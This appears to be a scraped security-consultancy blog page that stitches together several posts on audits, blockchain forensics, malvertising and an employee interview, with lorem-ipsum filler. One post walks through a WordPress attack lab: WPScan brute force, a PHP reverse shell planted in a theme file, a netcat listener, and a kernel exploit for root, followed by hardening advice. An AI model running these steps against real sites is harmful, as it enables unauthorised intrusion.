CyRAACS-logo-black-Orignal

Providing insights in the changed risk and opportunity landscape

Global situations relating to the COVID-19 pandemic have impacted the business and has also impacted the work of auditors. The current situations challenge the conventional methods adopted for an audit. The current uncertainty and unpredictability may create risks of material misstatement in the audits.

There anyone who loves or pursues or desires to obtain pain of itself, because it is pain, but because
occasionally circumstances occur in which toil and pain can procure him some great pleasure. To take a
trivial example, which of us ever undertakes laborious physical exercise,

Predicting the unpredictable: Adapting to the changing needs” has always been a key mantra, and this holds true today with the emergence of COVID-19.

Considering the recent situation and the paradigm shift in business operations CyRAACS would advise the audit teams to adopt the below methods for a precise, fact-based audit.

1. Re-evaluate the audit scope

Re-evaluate-the-audit-scope

With the change in the mode of business operations and the technology implemented, auditors may have to relook at the scope of the audit. Include the technology and architecture deployed to support remote working. Auditors may have to re-evaluate the effort estimates and timelines based on the changes in the scope of the audit.

2. Utilize Collaboration tools and communicate

Utilize-Collaboration-tools-and-communicate

Conference or video call facilities or collaboration tools such as Skype, Teams, Slack, etc. allow for regular communication with clients and team members. Extensively use collaboration tools to communicate what you need and what you have been working on. An additional point to note while implementing these communication and collaboration technologies is to keep an eye on the advisories issued with the vulnerabilities identified in these technologies. Any open-source tools adopted may be evaluated for any security flaws before implementation.

3. Use cloud services for storing evidence

Use-cloud-services-for-storing-evidence

Utilize cloud storage services to collect audit evidence. The cloud services like OneDrive, SharePoint enable gathering adequate, appropriate audit evidence remotely. Ensure all security controls are implemented in the cloud service being used for restricting any data leakages. Additionally, ensure that the current cloud platform being used is accessible to all stakeholders required to provide data for the audit.

4. Technology controls to be stringently implemented by the IT Team

Technology-controls-to-be-stringently-implemented-by-the-IT-Team

In the event of the recent crisis and the work from home model adopted globally, the IT team may be evaluating stricter and stringent controls on implementing digital certificates, Multi-Factor Authentication to the environment, etc. Auditors may integrate the additional security controls in their methodology to adapt to the changing environment.

5. Check for regulatory/contractual requirements for evidence sharing

Check-for-regulatory-contractual-requirements-for-evidence-sharing

All the regulatory requirements for data hosting, data sharing may be validated before sharing the data with the auditors. In the case of strict organizational policies on data sharing, organizations may create a segment or a white room for the auditors to securely review the evidence.

6. Centralize work performed by other auditors

Centralize-work-performed-by-other-auditors

Centralize the audit engagement and the documentation on the cloud platform. This would enable the audit team to coordinate and review the work of auditors to meet the requirements in auditing and reporting standards.

7. Flexibility in reporting audit findings

Flexibility-in-reporting-audit-findings

As audit teams respond to the crisis and changing business risks in differing ways there may arise a need for more adaptable and flexible auditing techniques During this period, auditors may not be restricted to the traditional reporting methods and may consider different reporting templates like unrated reporting, e-mail reporting, mid-review reporting.

8. Reassess key risks in a real-time environment

Reassess-key-risks-in-real-time-environment

Risk changes rapidly with the slightest change in the environment. Re-Assess the current environment to identify the new threat landscape and associated risks. The exercise would give insights into the changing risk landscape and aid in developing a robust risk mitigation strategy.

Additional Articles for a good read and understanding of global security controls and audits:

1. NBS Special Publication 500-153: Guide to Auditing for Controls and Security: A System Development Life Cycle Approach

2. NIST Special Publication 800-53 A: Assessing Security and Privacy Controls in Federal Information Systems and Organizations.

Conclusion

In conclusion, conducting a cybersecurity audit in the midst of a crisis is essential to ensure that an organization’s data and systems are secure. It is important for organizations to be aware of best practices for such audits, in order to successfully mitigate risks and vulnerabilities during times of uncertainty. Preparing for potential cyber threats by strengthening security protocols should be considered as part of any crisis plan. Organizations must also remain vigilant and monitor their systems on an ongoing basis, so as to detect possible threats before they become a problem.

Introduction

WordPress is a free and open-source PAAS structure that is being used by millions across the globe as a content management system. Its features include the integration of various plugins and themes.

Also, there are many vulnerabilities associated with the plugins and themes being used within WordPress to date. According to the statistics, 73.2% of the most popular WordPress installations are vulnerable to date. These can be identified using automated tools and can be exploited. One such example is explained in this blog on how an adversary can gain root access by exploiting a vulnerability present inside the WordPress theme engine.

There anyone who loves or pursues or desires to obtain pain of itself, because it is pain, but because
occasionally circumstances occur in which toil and pain can procure him some great pleasure. To take a
trivial example, which of us ever undertakes laborious physical exercise,

Below are the steps to perform Privilege escalation for a vulnerable WordPress theme engine:

Nmap Enumeration

Run Nmap enumeration scan to discover the open ports and services running on the target host.

Nmap reveals HTTP service running on port 80. Also, the directories discovered in the HTTP-enum scan points to the WordPress login page.

Privilege-Escalation-blog02

WordPress Login Panel

Browse to the login page of WordPress http://*target IP*/wp-login as shown in the screenshot below:

Privilege-Escalation-blog03

Now, to retrieve the username and password we need to run a brute-force scan using WPScan.

WPScan is a scanner built for enumerating and brute-forcing the usernames and passwords for WordPress.

WordPress enumeration using WPScan

Let us first enumerate a user enumeration scan to discover the user accounts linked with WordPress using the below command:

wpscan –url *target IP* –enumerate u

Privilege-Escalation-blog04

The user enumeration scan reveals the usernames of the users linked with WordPress account as shown in the screenshot below:

Privilege-Escalation-blog05

Run a Bruteforce scan

Now that we have the username, we shall run a brute-force scan to enumerate the password for the admin account. We will a run a brute-force scan to enumerate the password for the admin account for which we use the below command:

wpscan –url *target IP* –wordlist /root/rockyou.txt –username admin

Privilege-Escalation-blog06

As shown in the below screenshot, as part of the brute force scan we get the username and password for the admin account. The password for the admin account is princess.

Privilege-Escalation-blog07

Using the username and password obtained in the WPScan we try to login into the WordPress site and navigate to the themes section in the WordPress. WordPress plugins and themes are the vulnerable points for any WordPress website.

WordPress Theme Engine

After login navigate to Appearance>Themes>Editor

Now, we observe that there are multiple .php files in the templates and archives section. We could use any of these to upload the PHP reverse shell. For example, we will try to use archive.php file to upload the PHP reverse shell.

Privilege-Escalation-blog08

Replace the contents of archive.php file and replace it with our PHP reverse shell.

PHP Reverse shell to gain local privilege

In this case, let us use a PHP reverse shell that is downloaded from pentest monkey.

Run the below command and download the shell:

wget http://pentestmonkey.net/tools/web-shells/php-reverse-shell/ php-reverse-shell-1.0.tar.gz

Privilege-Escalation-blog09

Unzip the file using $tar -xzf php-reverse-shell-1.0.tar.gz command and copy the contents of the file in archive.php file in the browser.

The IP address and port should point to the attacking system’s IP and listener port as shown in the screenshot below:

Privilege-Escalation-blog010

Click on the update file at the bottom of the page and we observe that the files get updated successfully with the PHP reverse shellcode.

Privilege-Escalation-blog011

Gaining local user access

Now, open a new terminal and start a netcat listener on port 443 which is specified in the PHP reverse shell script using the below command:

·        nc -nvlp 443

Privilege-Escalation-blog012

Now, navigate to the modified archive.page in the browser using the below link:

·        http://*target IP*/wp-content/themes/twentytwelve/archive.php

As shown in the screenshot below, after traversing to the modified archive.php file in the web browser we get a low privilege reverse shell from the attacking systems IP to the victims IP.

We got a low privilege access for webserver user “www-data”.

Privilege-Escalation-blog013

The next step is to elevate the privilege and get root access.

Let us run a Linux privilege checker python script to enumerate the system info and check for the world-writable files.

For that run python server using the below command to transfer file from attacker’s system to target system

python -m SimpleHTTPServer 80

Checking file permissions using Privchecker

Download the linux.privchecker.py file on the tmp directory of the target system using the below command

wget http://*local IP*/linuxprivchecker.py

Privilege-Escalation-blog014

After enumerating we also know that the world-writable directory is the tmp directory for the user www-data.

Privilege-Escalation-blog015

Local Privilege Escalation

We know that the Linux version in use is Linux 2.6.32. Let us download a python script from exploitdb named as Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) – ‘CAN BCM’ Local Privilege Escalation.

Download the script in the world-writable directory “tmp” which was discovered as part of the enumeration scan.

This script might be helpful in elevating from local privilege to root privilege.

Privilege-Escalation-blog016

Compile the script using the below command and save it in the output file named as rootpriv:

·        gcc 14814.c -o rootpriv

Now, run the output file using ./rootpriv command.

Gaining Root Access

Once the script is successfully executed using whoami check the current user.

We get access to the ROOT account as shown in the below screenshot:

Privilege-Escalation-blog017

Check for the files present in the root directory.

Privilege-Escalation-blog018

There is an interesting file wp.sql which has all the database tables and values in it which could be used to craft SQL injection attacks. Below are the contents of wp.sql file:

Privilege-Escalation-blog019

The blog summarizes how a user can gain root access using a vulnerable WordPress theme engine.

There are many other loopholes in WordPress that can be used to elevate privilege and retrieve sensitive information.

Preventive measures

Below are the measures you can adopt to keep your WordPress site secure:

1.   Sucuri Scanner

Install and use WordPress security plugin – Sucuri Scanner.

Privilege-Escalation-blog020

We need to set up an auditing and monitoring system that keeps track of everything that happens on the website. This includes file integrity monitoring, failed login attempts, malware scanning, etc.

The best part about Sucuri’s firewall is that it also comes with a malware cleanup and blacklist removal guarantee. Basically, if you were to be hacked under their watch, they guarantee that they will fix your website (no matter how many pages you have).

2.   Change the Default “admin” username.

Privilege-Escalation-blog021

In the old days, the default WordPress admin username was “admin”. Since usernames make up half of the login credentials, this made it easier for hackers to do brute-force attacks.

Since WordPress doesn’t allow you to change usernames by default, there are three methods you can use to change the username.

3.   Disable File Editing

Privilege-Escalation-blog022

WordPress comes with a built-in code editor which allows you to edit your theme and plugin files right from your WordPress admin area. In the wrong hands, this feature can be a security risk which is why we recommend turning it off.

4. Add Two Factor Authentication

Privilege-Escalation-blog023

The two-factor authentication technique requires users to log in by using a two-step authentication method. The first one is the username and password, and the second step requires you to authenticate using a separate device or app.

Most top online websites like Google, Facebook, Twitter, allow you to enable it for your accounts. You can also add the same functionality to your WordPress site.

5.   Strong Passwords and User Permissions

Privilege-Escalation-blog024

Many systems and applications include functionality that prevents a user from setting a password that does not meet certain criteria. Functionality such as this should be leveraged to ensure only Strong passwords are being set.

6. Keep WordPress Updated

Privilege-Escalation-blog025

Since WordPress is open-source, anyone can study the source code to learn and improve it. You need to make sure that all your WordPress plugins, themes, and the core itself are always up to date.

7.   Disable Directory Indexing and Browsing

disable-directory-indexing

Directory browsing can be used by hackers to find out if you have any files with known vulnerabilities, so they can take advantage of these files to gain access. Directory browsing can also be used by other people to investigate your files, copy images, find out your directory structure, and other information. Therefore, it is highly recommended that you turn off directory indexing and browsing.

Cyber-Forensics-cyraacs-blog

Introduction

Blockchain is an emerging technology that is quite popular nowadays due to the popularity of cryptocurrency. Apart from blockchain being used in cryptocurrency, it is also marketed as a cure for a lot of things including cybersecurity. Blockchain is considered to be a nearly impenetrable technology as by design, blockchain is resistant to modification of the data. The blockchain contains a list of records or blocks which are linked using cryptography. Each of those individual records/blocks contains information and data that are combined together and verified. Information such as a cryptographic hash function of the previous block, timestamp, and transaction details are permanently recorded in a distributed ledger. The ledger is decentralized in nature, all transactions are done across a peer-to-peer network. Blockchain technology is designed in such a way that there is no central authority or storage location. Every user on the network plays a part in storing some or all of the blockchain. Everyone is responsible for verifying the data that is stored and/or shared to make sure false data cannot be added and existing data cannot be removed.

Blockchain-blog-1

Blockchain technology has been around for more than a decade. It was invented by a person using the name Satoshi Nakamoto in 2008 to serve as the public transaction ledger of the cryptocurrency bitcoin. However, as technology has gradually spread worldwide, people have begun using it in a variety of ways in numerous industries, including as a means to increase cybersecurity. Blockchain is a chain of records that leads to the formation of a distributed network that can have millions of users all over the world. Every user can add information to the blockchain and all data in the blockchain is secured through cryptography. Every other member of the network is responsible for verifying that the data being added to the blockchain is real. This is done using a system of three keys private, public, and the receiver’s key that allow members to check the veracity of the data while also confirming whom it comes from. The verified data then form a block and will be added to the chain of data. In order to make updates to a particular piece of data, the owner of that data must add a new block on top of the previous block, creating a very specific chain of code.

Blockchain Implementation in Cyber Forensics

The network being accessed by an unauthorized person can lead to data being either stolen or damaged. Hence, it becomes essential for an individual or organization to determine the invasion. The mode of collecting and preserving evidence has a significant role to play in ensuring that the evidence is accountable in the courtroom during various situations such as lawsuits or criminal complaints.

Identifying the attack/breach and generating the required documents about the causes of cyber-attack or cyber fraud can be accountable through the use of blockchain technology. Truth-based evidence is always important in any cybercrime investigation. Digital evidence moves down the hierarchy through the chain of custody in the different levels of transactions in any investigation process. Blockchain technology can provide a clear and exhaustive view of the transactions that have taken place concerning the evidence, right from the time the evidence originated from the source [2].

There are many reported cases of missing police evidence and several of them go unaccounted for giving an easy way out for criminals, such types of things can also be prevented using blockchain technology. It can enable appropriate authorization to those who are permitted to enter the evidence room, whether electronic, magnetic, or by using private keys. The scientific approach in digital forensics flow through the search authorities, the chain of custody of evidence, imaging and hashing function, validation of data using appropriate tools, report-ability, and repetition of presentation. The entire process can be made data-centric using blockchain technology.

The hash validation with the blockchain and the timestamp will prevent repeatability and contamination of information. Keeping a clear and unique track of who accessed what and when will help to avoid the contamination of evidence and information. The blockchain technology-based application can be used to ensure proper operating practice when it comes to evidence management practices. Necessary questions like How the core data is stored, how it is communicated, who is the person responsible for handling the data, and the factors that contribute to the physical security of the data can all be streamlined efficiently. Ideas such as working with the duplicate copy and not with the original can be validated using the hash. The Hash function will take the data and will generate a fixed-sized bit sequence in the output. Thus, creating a digital fingerprint of the input data.

Blockchain Implementation in Cyber Security

The number of people joining the world wide web and technology is continuously growing and developing at a very fast rate, more data gets produced and more hackers will attempt to steal or corrupt that data. The technology behind blockchain is flexible and unbelievably helpful for the future of the Internet, permitting users to better secure their data. Innovative uses for blockchain technology are already becoming a part of other fields beyond cryptocurrencies and can be especially useful to boost cybersecurity. Blockchain implementation will facilitate in forestall a lot of threats and attacks in a very system and might forestall the information from being taken or destroyed. A number of the items that blockchain will facilitate are: –

  I.       Preventing Fraud and Theft of data: – Blockchain technology provides one of the best securities to protect data from hackers by preventing potential fraud and decreasing the chance of data being stolen or compromised. In order to destroy or modify blockchain, a hacker would have to destroy the data stored on every user’s computer in the global network. This could be millions of computers, with each one storing a copy of some or all the data. Bigger blockchain networks with more users have an infinitely lower risk of getting attacked by hackers because of the complexity required to penetrate such a network.

   II.       Preventing Distributed Denial of Service (DDOS) Attacks: – Hackers can use several techniques to launch an attack, most common is sending a large number of requests/packets to the system until the system becomes unable to process these requests/packets and leading to the failure/crash of the system. DDoS attacks have been happening at an increased frequency recently, affecting bigger companies like Twitter, Spotify, SoundCloud, and more. The current difficulty in preventing DDoS attacks comes from the existing Domain Name System (DNS). The fact that it is only partially decentralized means that it is still vulnerable to hackers because they are able to target the centralized part of DNS and continue crashing one website after another. Implementing blockchain technology would fully decentralize DNS, distributing the contents to a large number of nodes and making it nearly impossible for hackers to attack. Domain editing rights would only be granted to those who need them (domain owners) and no other user could make changes, significantly reducing the risk of data being accessed or changed by unauthorized parties.

  III.       Decentralized Storage Solutions: –

Data is becoming more valuable than gold and oil. Every business and individuals accumulate tones of sensitive data about themselves or customers. Unfortunately, this data is also quite attractive to hackers. And one of the most convenient things you do for cybercriminals is to store all of it in one place. The business mainly is still using centralized storage when it comes to data. Blockchain-based storage solutions are slowly gaining popularity. An example of this can be Apollo data cloud which is developed by the Apollo Currency team allows users to archive data on the blockchain and grant permission for access to third parties. The cryptographic access key can be revoked at any time, further reducing the risk of a breach. Thanks to the decentralized nature of blockchain technology, hackers no longer have a single point of entry, nor can they access entire repositories of data in the event that they do get in.

Introduction

Malvertisements are malicious advertisements distributed in the same way as legitimate online advertisements. It is one of the common practices to use spread malware. Cybercriminals use the advertising strategy by pretending as legitimate campaigns. Those malvertisements will either attempt to download malware directly onto visitor’s systems/devices or redirect visitors to websites meant to spread ransomware, viruses, or other malicious programs. The process of creating malvertisements and spreading malware is called malvertising. Malvertising is a favoured medium for criminal behaviour as it takes advantage of consumer trust in both companies running campaigns and advertising networks.

Malvertisements-blog-01

Ad networks are responsible for distributing real and fraudulent advertisements. The reliability of a website does not necessarily determine and has also been irrelevant to some extent to whether or not it will contain malvertisements. But saying that at the same time is the best place to be not infected with malvertisements. Recent examples have proven that even the most well-known, legitimate sites can distribute malvertisements unknowingly. In recent years, reputed sites such as Forbes, The New York Times Online, London Stock Exchange, Spotify, etc have all been negatively impacted by malvertising campaigns that infected visitors with malware.

Malvertisements vs Adwares

People, in general, are confused between malvertisements and Adwares as they both deal with affecting online advertisements. Adwares are a program running on a victim or user’s system which is packaged with other legitimate softwares. Adware displays unwanted advertising, redirects search requests to advertising websites, and mines data about the user to help target or serve advertisements.

Key differences between malvertisements and adwares are:

1.    Malvertisements involve deploying or injecting malicious code on a publisher’s web page. The targeted audience of malvertisements are not individual or selected users whereas Adware, however, is only used to target individual users.

2.    Malvertisements are only dangerous and affect users that view the infected webpage or website whereas adwares once gets installed keeps on operating on the user’s computer.

How Malvertisements Distribution Works?

Malvertisements are distributed via the same methods as normal online advertisements. Infected graphic files are submitted to a legitimate advertisement network with hopes that the advertiser won’t be able to differentiate between trustworthy ads and harmful ones. Advertisements generally attract and encourage viewers to click. When approved by the advertisers these malicious advertisements are added or distributed on legitimate sites. In some cases, cybercriminals will even re-register expired, but previously legitimate, domains to disguise themselves as trustworthy domains. Criminals can use redirects to send clickers to a malicious site, and users remain ignorant because they expect redirects when clicking on an ad. While on the malicious website, code will run in the background which will attempt to download malware onto the device. This unintentional download of a virus or malicious code is known as a drive-by download. Malvertisements often use drive-by attacks to download ransomware onto targeted computers. Advanced forms of malvertisements can even install malware on visitor’s devices directly from the legitimate website that is displaying the ad and without any interaction from visitors.

Malware Insertion Techniques

Attackers or people with malicious intent use several delivery mechanisms to insert their malicious codes into advertisements.

1.    Malwares in Advertisements calls: When a website shows a page featuring an ad, the ad exchange delivers advertisements to the user through a variety of third parties. An attacker can compromise one of these third-party servers, who can attach malicious code to the ad payload.

2. Post-click malware injection: Users who click on an ad are typically redirected between multiple URLs, ending with the ad landing page. If any of the URLs along this delivery path are compromised by an attacker, they may execute malicious code.

3.    Malware in Text or Banner Advertisements: Malware may be found in a banner ad or text message. For instance, an ad can be delivered in HTML5 as a combination of images and JavaScript which may contain malicious code.

4.    Malware within a pixel of an image: The pixels are embedded with codes in an advertisement call. A legitimate pixel sends data to the server for tracking purposes. If an attacker intercepts a pixel’s delivery path, it can send a response, containing malicious code, to the user’s browser.

5.    Malware within the video: Video players don’t protect against malware. Examples can be videos based on flash or specific video formats such as VAST. Video format VAST contains pixels from third parties, which could contain malicious code. Videos based on flash can inject an Iframe into the page, which downloads malware, even without having the user click on the video. Flash files might also load a pre-roll banner and attackers can inject malicious code into the pre-roll banner, and it can run even without the user clicking on the video.

Malvertisements: With or Without User Interaction

Common malvertisements generally need user interaction in order for the malwares to be downloaded in a victim’s system or infect the victim/user’s system. User interaction can be victims clicking on an unsafe malicious advertisement. Following attacks or things that might happen on users viewing or interacting with malvertisements:

1.    Download or installation of malwares on the computer or systems viewing those malicious advertisements.

2.    Redirect the user or victim to a malicious site.

Some advanced malvertisements can affect or cause harm to a user without user interaction. Malvertising might perform the following attacks on users viewing the malvertisements without clicking it:

1.    A “drive-by download” — installation of malware or adware on the computer of a user viewing the ad. This type of attack is usually made possible due to browser vulnerabilities.

2.    Forced redirect of the browser to a malicious site.

3.    Displaying unwanted advertising, malicious content, or pop-ups, beyond the ads legitimately displayed by the ad network. This is done by executing Javascript.

Identification of Malvertisements

Malvertisements Mitigations and Best Practices:

What is your name and job title in CyRAACS?

My name is Anamika, I lead the Application security VAPT projects in CyRAACS.

How would you summarize what you do? Why CyRAACS is a great place to work

At CyRAACS I am responsible for managing and leading VAPT projects wherein we must conduct VAPT assessments for IT Systems, Web applications, Mobile applications, and critical network infrastructure. We as a team conduct manual application penetration testing of thick client applications, mobile applications, web applications and web services, API’s to minimize exposure to attacks.

I am responsible to communicate with client teams often to explain and demonstrate vulnerabilities to application/system owners and assist with the mitigation of the identified vulnerabilities. I support fast-paced delivery in challenging projects. My job requires me to be highly motivated, detail-oriented, and client-focused.

CyRAACS is a great place to work because every day provides an opportunity to learn something new, to mentor, and to be mentored to achieve our client’s goals. Being part of a team that is focused and dedicated to stand up to client expectations and help employees succeed, is the best thing anyone can ask for in their career.

How long have you worked with CyRAACS?

I had the pleasure of working in CyRAACS for near to 3 years now.

What is the most interesting thing about working in CyRAACS, and about the work you do?

CyRAACS follow a no hierarchy model wherein the management keeps their doors open to promote new ideas and transparency of information within the organization.

My job demands me to be constantly updated with the latest technologies to challenge myself to know more about the trend revolving around cyber security. I like the fact that I can interact with the key stakeholders and technical team to suggest security remediations in line with their business scenario.

My journey through these years has seen many changes come through in the organization, and each time, these have been for the better, for the leadership in CyRAACS is committed to make CyRAACS a big success story in the coming years.

What are three benefits you have discovered about working in CyRAACS that you weren’t aware of when you started?

My journey at CyRAACS has been very gratifying and rewarding. I always had opportunities and challenges beyond my current role which helped me prove myself and achieve greater heights.

CyRAACS has helped me achieve my professional goal by sponsoring my certification.

I have learned over these years about my own domain, but there has also been a lot of cross-functional learning which has helped in overall growth in my career.

At CyRAACS, Individuals come in at different levels with different skill sets, expertise, aspirations, and attitudes. Here, at CyRAACS we learn to think independently, be focused, and push ourselves out of our comfort zone. This is a company that adds significant value to each employee, and it helps each individual reach her or his highest potential

I am proud and humbled to be amongst such incredibly talented people and I am thankful for the opportunity to contribute to our continued success.

What are your thoughts about the company’s vision and direction, and your role in helping CyRAACS achieve them?

Management at CyRAACS has always been transparent about what they are doing to achieve the company’s vision and has ensured that we are kept aware of the progress the company is making.

When I see my leaders working hard to live the standards of the vision, I feel equally motivated to do the same. I believe that we should be accountable for meeting our own goals and doing our part to achieve the company’s vision and direction.

I agree with the fact that transparency is great for the company's vision, but it is also a good way to build trust with employees and customers. Staying transparent about the failures and successes of the company will help your employees be more engaged and productive.

What advice would you give a job seeker who’s thinking about applying for a job with CyRAACS?

My advice to job seekers would be if you are looking for a challenging, fast-growing environment with opportunities to learn cross-functional skills, CyRAACS is a one-stop for you.

Specifically, for freshers, this is a great place to start their career because here you are mentored at every step to push yourself ad uncover your true professional.

The culture is transparent, every employee, irrespective of their position is given a chance to be heard, and there are ample opportunities available to those who want to build a career here

When you tell people about your job, what’s one thing that surprises them, or gets them excited about the work you do?

As the first job is considered as a most important point in anyone’s career path, CyRAACS proved to be the right tipping point for me. I joined as a fresh MBA graduate.

Early in my career, I was given a chance to handle a separate developing service line – Application security and I was trusted with the responsibility of handling stakeholders on my own. The whole experience has been a great learning opportunity for me.

My growth graph has been exponential as the management here has been very supportive and has given me ample learning opportunities with meaningful rewards and recognition.

Your achievements, Value provided to clients and Clients empathy etc

I have successfully completed 150+ projects with more than 50% repeat engagements.

Client achievement and empathy: I have received excellent recommendations from the majority of my clients highlighting the quality of deliverables, meeting up to the deadlines, and going beyond the set expectations from industry sector clients such as Banking industries, IT services, Healthcare, and Telecommunications.

On request from one of our clients, a tax consulting multinational company wherein the client had to make their application go live, we were given a strict deadline to complete the said task. Conducting VAPT and helping a client secure their application was one of the major responsibilities which I abided to. The client was very happy with the engagement and in turn, suggested their internal departments conduct VAPT for their other applications.

Overnight audit requirement for one of our clients operating in small finance bank sectors was a crucial task to be completed.  A time constraint of 1 day was given to retest 10 applications. I took it as a challenge and had push myself to meet the said timelines and completed the task by leading my team. The client in return has extended their empanelment contract with us as their security partner.

Client-specific challenges wherein their application is inaccessible, or new functionality is introduced within the application, we have ensured that we accommodate such requests and perform multiple rounds of testing to make certain that all the functionalities of the application are tested, and the application is secure to go live on production. Clients have considered this as a key-value provided to them appreciating our extra efforts.

On request from one of our clients, an IT services company, we had to conduct VAPT for their application and Infrastructure components wherein they were given a strict government deadline to abide by. This request was taken into priority and I had to drive it to completion within the said timelines. A client gave positive feedback on the engagement and gave our referrals to other partner companies as a result.

Achievements and Certifications

Client Success Stories

Repeat clients – Our quality output and focussed approach has made CyRAACS an empanelled security partner for many of the client projects led by me across various industry sectors such as Finance, Banking, IT services, Healthcare, Telecommunications.

Referrals – Many of our clients have given referrals to their other partner companies for CyRAACS as a security vendor.

June 7, 2024
Leveraging GRC for Organizational Success: A Comprehensive Approach

Governance, Risk, and Compliance (GRC) plays a pivotal role in organizational success by providing a structured and integrated approach to managing an organization's overall performance, addressing risks, and adhering to

Read More
June 5, 2024
Cracking the Code: A Guide to Understanding and Complying with Regulatory Requirements

Compliance with government laws, regulations, and rules is essential for all organizations. A regulatory requirement is a directive imposed by a government entity on an organization.

Read More
April 1, 2024
A Comprehensive Guide to Establishing an Effective GRC Framework

In today's dynamic business landscape, organizations face an ever-increasing array of challenges, from regulatory compliance and cybersecurity threats to operational risks and data privacy concerns. To navigate

Read More
March 29, 2024
Conducting a Risk Assessment: A Practical Guide for Organizations

Information security is a critical concern for organizations in the digital age, as the proliferation of data and technology brings new vulnerabilities and threats. To safeguard sensitive information, organizations must conduct information security risk assessments. This comprehensive guide will walk you through the key steps and best practices involved in

Read More
March 22, 2024
Ensuring Compliance and Security: A Comprehensive Guide to Achieving ISO 27001 Certification

Purchasing ISO 27001 document – Your organization must purchase the ISO 27001 document and understand how to implement a structed ISMS for your organization. This will help your organization to understand why the controls are necessary and how they can be implemented to mitigate risks.

Read More
March 21, 2024
DPDPA Decoded: A Comprehensive Guide to the Digital Personal Data Protection Act

In the age of digitalization, where personal data has become a valuable commodity, the need for robust data protection laws has become increasingly crucial. Recognizing this need, India has enacted the Digital Personal Data Protection Act, 2023 (DPDPA), marking a significant milestone in the country's data

Read More
March 18, 2024
Decoding GDPR Compliance – A complete guide to understanding the Law and getting compliant with it.

The General Data Protection Regulation is a law that was enacted in 2018, it has transformed the way businesses worldwide handle and protect personal data. With stringent requirements for data privacy and security, GDPR compliance is essential for organizations that collect, process, or store

Read More
February 10, 2024
The rudimentary differences between an ISO 27001 Certification and a SOC2 Certification

In today’s ever-evolving cyber and risk landscape, information security has come to the forefront to combat the sophistication of cyberattacks and the constantly changing technology framework. Two widely recognized information security standards stand out in this arena: ISO 27001

Read More
February 9, 2024
Getting Started With your GRC Journey

Embarking on the journey of Governance, Risk Management, and Compliance (GRC) is a significant step for any organization in today's complex and highly regulated business environment. To thrive and ensure sustainable growth, businesses must proactively address governance issues, manage risks, and meet compliance requirements. In this article, we will guide you through the crucial steps […]

Read More
February 8, 2024
Unlocking the Potential of Cybersecurity: The Key to Gap Assessment

In the ever-evolving realm of cybersecurity, organizations face an unceasing challenge to secure their digital fortresses. A mid-sized financial services firm prides itself on its commitment to safeguarding customer data and financial assets. However, recent cyber threats have escalated, and the firm is keen to ensure that its cybersecurity defences remain

Read More
February 7, 2024
PCI DSS Certification Readiness Simplified

In today's digital age, where data is the lifeblood of business operations, protecting sensitive financial information has never been more critical. The Payment Card Industry Data Security Standard (PCI DSS) was established to ensure the secure handling of card data, and compliance with this standard is mandatory for any organization that processes cardholder information. Achieving […]

Read More
February 2, 2024
A Comprehensive Guide to Internal Audit and Cybersecurity: Enhancing Organizational Governance and Security

In today's dynamic business landscape, internal audit plays an even more critical role due to the complexities and the increased emphasis on

Read More
September 27, 2023
API Security: A Comprehensive Guide to Protecting Your Digital Assets

Application Programming Interface or API serves as a data connection that facilitates the sharing of data with other applications. In today's rapidly evolving digital landscape,

Read More
August 25, 2023
Digital Personal Data Protection Act – India (DPDP Act) - August 2023

Lok Sabha passed the Digital Personal Data Protection Act – India (DPDP Act) - August 2023 , India’s 2nd attempt in framing a privacy legislation.Aug 2017: Privacy as a fundamental right reaffirmed in Justice KS Puttaswamy vs Union of India by SC Justice Srikrishna Committee constituted to examine data

Read More
June 16, 2023
Draft Master Directions on Cyber Resilience and Digital Payment Security Controls for Payment System Operators

The Reserve Bank of India (RBI) has introduced a draft master direction that covers various domains of cyber resilience and digital payment security.

Read More
June 9, 2023
Will passkeys be the future and can we forget passwords?

Passkeys are a significant improvement over passwords. They are faster, more secure, and more convenient. Many brands will follow in supporting passkeys. I expect passkeys to become the standard for login security in the near future like how 2FA was adopted in the past.

Read More
May 18, 2023
Top 5 Priorities for CISOs in 2023

The cybersecurity landscape is constantly evolving, and CISOs need to be prepared to defend against increasingly sophisticated attacks.

Read More
April 19, 2023
RBI: Master Direction on Outsourcing of Information Technology Services

Regulated Entities (Res) outsource a substantial portion of their IT activities to third parties, which exposes them to various risks. RBI released a finalized version of Master Direction on Outsourcing of Information Technology Services on April 10, 2023.

Read More
April 10, 2023
Cyber Security And Cyber Resilience Framework For Portfolio Managers - From SEBI

Portfolio managers work closely with their clients to understand their financial goals, risk tolerance, and investment preferences.

Read More
March 9, 2023
GISEC 2023 Shaping the Future of Cybersecurity with Innovative Solutions

The GISEC 2023 event is scheduled to be held in Dubai World Trade Center, United Arab Emirates, on 14, 2023 to March 16, 2023.

Read More
February 16, 2023
Difference Between CBDC and UPI

The RBI announced the launch of the first pilot for retail digital Rupee (e₹-R) on December 01, 2022. It has commenced the pilot in the wholesale segment from November 2022.

Read More
December 7, 2022
What is an Account Aggregator?

An Account Aggregator shall transmit the financial data pertaining to the user only after receiving formal consent from the user

Read More
November 29, 2022
API Security and Best Practices

APIs are the backbone of the internet, powering the applications and services that we use every day

Read More
November 22, 2022
Common Cybersecurity Threats, their prevention, and possible Mitigation

In order to protect your business from common cybersecurity threats, it is important to be aware of the different types of attacks that exist and how to prevent them

Read More
November 22, 2022
Guidelines on Digital Lending by Reserve Bank of India

Read what RBI has to say on digital lending in the Guideline on Digital Lending issued on 2nd September 2022

Read More
August 4, 2022
What’s Buy Now Pay Later (BNPL)? Why is it in the news?

The concept of BNPL is similar to that of credit cards wherein a consumer makes a purchase through a credit line and the payment is done later

Read More
May 16, 2022
Why Security Architecture Review is important for Cyber Security?

Security Architecture Review is a holistic review of security that covers networks, Data, Applications, Endpoint, Cloud, etc.

Read More
March 10, 2021
Top 5 Benefits of Cloud Infrastructure Security 2023

Companies are realizing the benefits of cloud infrastructure. They are quicker to scale, cheaper to maintain, and more flexible.

Read More
February 10, 2021
Five Board Questions That Security and Risk Leaders Must Be Prepared To Answer

Executive leaders of organizations and board members are ultimately responsible for ensuring the long-term security

Read More
January 1, 2021
New Year 2021 Resolution for the CISO

With the year 2020 and the pandemic overwhelming us, we must be conscious of the increase in cyber security threats that are looming in front of us. Here are a few thoughts

Read More
December 10, 2020
Best Practices For Conducting Cybersecurity Audits In Crisis Situation

Global situations relating to the COVID-19 pandemic have impacted the business and has also impacted the work of auditors. The current situations challenge the conventional

Read More
November 10, 2020
Privilege Escalation by Exploiting WordPress Vulnerability

According to the statistics 73.2% of the most popular WordPress installations are vulnerable till date. These can be identified using automated tools and can be exploited.

Read More
October 10, 2020
